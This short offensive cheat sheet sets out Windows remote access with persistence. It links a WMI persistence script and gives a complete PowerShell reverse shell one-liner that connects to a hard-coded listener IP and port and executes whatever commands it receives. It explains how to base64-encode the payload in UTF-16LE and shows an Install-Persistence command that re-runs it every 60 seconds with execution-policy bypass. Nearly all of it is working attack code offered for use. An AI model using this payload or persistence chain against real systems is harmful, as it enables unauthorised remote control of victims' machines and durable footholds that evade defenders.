https://raw.githubusercontent.com/subesp0x10/Wmi-Persistence/master/WMI-Persistence.ps1

powershell reverse shell payload (remember to change the $hostip, and $port if needed, value to target your kali listener IP)
& {$ps=$false;$hostip='192.168.100.16';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}

Base64 this powershell reverse shell with https://gchq.github.io/CyberChef
(remember to use the combo 'encode text with UTF 16LE' then 'to base64')

Then use the 'Interval' option in the WMI-Persistence script
Install-Persistence -Trigger Interval -IntervalPeriod 60 -Payload "c:\windows\system32\cmd.exe /c powershell -nop -noni -exec bypass -e <Base64 payload>"
